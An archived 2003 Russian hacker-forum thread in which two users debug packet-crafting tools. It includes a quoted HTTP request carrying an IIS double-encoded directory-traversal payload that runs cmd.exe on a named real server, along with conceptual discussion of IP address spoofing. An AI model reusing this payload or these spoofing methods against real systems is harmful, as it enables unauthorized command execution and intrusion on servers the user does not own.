Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Чаты (https://forum.antichat.xyz/forumdisplay.php?f=10)
-   -   Inet crack (https://forum.antichat.xyz/showthread.php?t=1249)

Rabid Rabbit 18.11.2003 03:30

Access violation at address XXXXXXXX in module 'INETCRACK.EXE'. Read address FFFFFFFF при посылке пакета:
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">GET http://chat.isurgut.ru/..%255C..%255C..%255C../winnt/system32/cmd.exe?/cmd.exe+dir+c:%255C HTTP/1.1
Accept: */*
Accept-Language: ru
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)
Host: chat.isurgut.ru
Proxy-Connection: Keep-Alive[/QUOTE]<span id='postcolor'>
%255С - это юникод &quot;\&quot; (то же что и %5С но на последнюю разновидность юникод-бага IS лечится, заплатка тобишь есть) Если с другими глюками еще можно было мириться то этот баг поверг меня в уныние...

Algol 18.11.2003 13:38

Загрузил обновленную версию.
Этот баг исправлен.

Rabid Rabbit 22.11.2003 03:57

Я тогда порыскал по инету (ну лень было самому писать) и нашел вот это чудо:
HttpGenerator -- мдаааhttp://forum.antichat.ru/iB_html/non...ticons/sad.gif -- ну удивительно похоже на поделки мелкософтовцев дяди билли: такой же ламерский подход к потенциальным юзверям энтой с позволения сказать проги. Зачем все усложнять , поля какието заполнять, проверки производить, - я офигел просто. В таком вот плохом настроении пришлось всеже поставить себе дельфю аж третьей версии и дорабатывать одну свою прогу (она тогда какраз на третьей версии и писалась - давно дело было). Вот тут можешь посмотреть: portsniffer.zip. Единственное отличие что строку Proxy-Connection: Keep-Alive из запроса настоятельно рекомендуецца убрать, а так работает. Ну и &quot;http://chat.isurgut.ru&quot; указывать нет нужды: полный адрес для прокси нужен а мы можем от корня пути считать. Примочки типа аутокоунт уже обленился к тому времени посему и так сойдет. Ну и счас твою новую версию тоже качнул. Сенксhttp://forum.antichat.ru/iB_html/non...cons/smile.gif

Rabid Rabbit 23.11.2003 05:48

да и еще один баг репорт но уже по этому форумуhttp://forum.antichat.ru/iB_html/non...cons/smile.gif Алгол сотри мыло.

Algol 24.11.2003 12:57

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Rabid Rabbit @ ноября 22 2003,02:57)</td></tr><tr><td id="QUOTE">Я тогда порыскал по инету (ну лень было самому писать) и нашел вот это чудо:
HttpGenerator -- мдаааhttp://forum.antichat.ru/iB_html/non...ticons/sad.gif -- ну удивительно похоже на поделки мелкософтовцев дяди билли: такой же ламерский подход к потенциальным юзверям энтой с позволения сказать проги. Зачем все усложнять , поля какието заполнять, проверки производить, - я офигел просто.
Вот тут можешь посмотреть: portsniffer.zip. Единственное отличие что строку Proxy-Connection: Keep-Alive из запроса настоятельно рекомендуецца убрать, а так работает.[/QUOTE]<span id='postcolor'>
portsniffer не работает , грит что
---------------------------

---------------------------
Exception EOleSysError in module portsniffer.exe at 00038801.
Класс не зарегистрирован.
---------------------------
ОК &nbsp;
---------------------------

Rabid Rabbit 29.11.2003 05:50

Ну ладно, счет 1:1 :-) Там с активиксами запара. Обновил прогу и включил туда недостающие лайбреризы.

Algol 01.12.2003 20:00

Все равно не работает, та же самая ошибка.

А подделывать IP адрес в пакетах не пробовал ?

Rabid Rabbit 02.12.2003 06:30

Да я пробовал на 95, 98, МЕ - работает. Ты бат файл смотрел? Там фишка в том чтобы лайбреризы в систем папку скопировать а затем регистрировать. Но если винда 2000 или там NT т.п. то regsvr32.exe в папке system32 лежит - соответственно тудаже лайбреризы копировать нуна. Ты наверно под ИксПи пускал (под этой системой я не тестировал).

Носки, пользуемые моей прогой являются активиксами, соответственно локал айпи ридонли (изменить это нельзя так как диспинтерфейс) но даже не в этом фишка. Если посылать синаск или там Port Unreachable, Protocol Unreachable и др. то айпи конечно подделать можно. Вот что тогда получится: до первого шлюза пакет дойдет и если у шлюза настройки на диапазон внутренних айпи стоит то отсечка если нет то пойдет дальше но с айпишником шлюза, дойдет до сервера и ответ (если будет) вернется к шлюзу, от шлюза пойдет на подделаный айпи. По моему так хотя это вопрос достаточно сложный и здесь много нюансов. Ну и посоку большинство коннектов устанавливаются в два этапа то принять или послать данные серверу на конкретный порт не получится - т.е. это работает только в одну сторону и неизвестно как там реагирует сервак. Можно широковещательные слать но это уже датаграмы. Можно пользовать сокс5 проксю - тогда рулез. Если прога сокс5 не держит то юзать сокскап прогу.

А ты пробовал? Подробнее плиз.

Rabid Rabbit 02.12.2003 06:35

емае, два раза запостил сори. как удалять посты?

Algol 02.12.2003 18:23

Пробовать то я пробовал, но только на уровне IP протокола (через RAW, Winsock 2).
Установить TCP соединение конечно таким макаром не удается.
Но вот интересно, что будет если установить соединение со своим IP, а при посылке пакета данных подменить обратный адрес? В таком случае какой адрес будет фиксировать удаленный сервер ?





Время: 21:20